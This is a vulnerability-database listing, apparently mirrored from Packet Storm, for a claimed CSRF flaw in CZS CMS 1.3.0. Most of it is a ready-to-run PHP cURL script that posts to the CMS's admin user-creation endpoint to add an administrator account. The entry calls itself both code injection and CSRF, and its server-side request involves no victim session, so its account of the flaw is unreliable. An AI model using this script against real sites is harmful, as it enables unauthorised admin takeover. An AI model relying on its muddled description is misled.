Lucene search
K

📄 CZS CMS 1.3.0 Cross Site Request Forgery

🗓️ 25 Nov 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 127 Views

CZS CMS version 1.3.0 has a cross-site request forgery vulnerability; a PHP PoC creates a new admin user.

Code
=============================================================================================================================================
    | # Title     : CZS CMS v 1.3.0 php code injection vulnerability                                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.cszcms.com                                                                                                      |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: CZS CMS version 1.3.0 suffers from a cross site request forgery vulnerability.
    
        (Related : https://packetstorm.news/files/id/189609/ Related CVE numbers: ) .
    
    [+] Usage : php poc.php 
    
    [+] Set Target : LIne 5 
    
    [+] PayLoad :
    
    <?php
    // CSRF PoC script in PHP
    
    // Define the target URL and POST fields
    $target_url = "http://TARGETSITE/admin/users/new/add";
    $fields = [
        'name' => 'admin',
        'email' => '[email protected]',
        'password' => 'pass',
        'con_password' => 'pass',
        'group' => '1',
        'pass_change' => 'yes',
        'active' => 1
    ];
    
    // Initialize cURL session
    $ch = curl_init();
    
    // Set cURL options
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($fields)); // Post the fields as URL-encoded
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Return response as string
    
    // Execute cURL request and capture the response
    $response = curl_exec($ch);
    
    // Check for errors
    if ($response === false) {
        echo "Error: " . curl_error($ch);
    } else {
        echo "Request sent successfully!";
    }
    
    // Close cURL session
    curl_close($ch);
    ?>
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Nov 2025 00:00Current
6.7Medium risk
Vulners AI Score6.7
127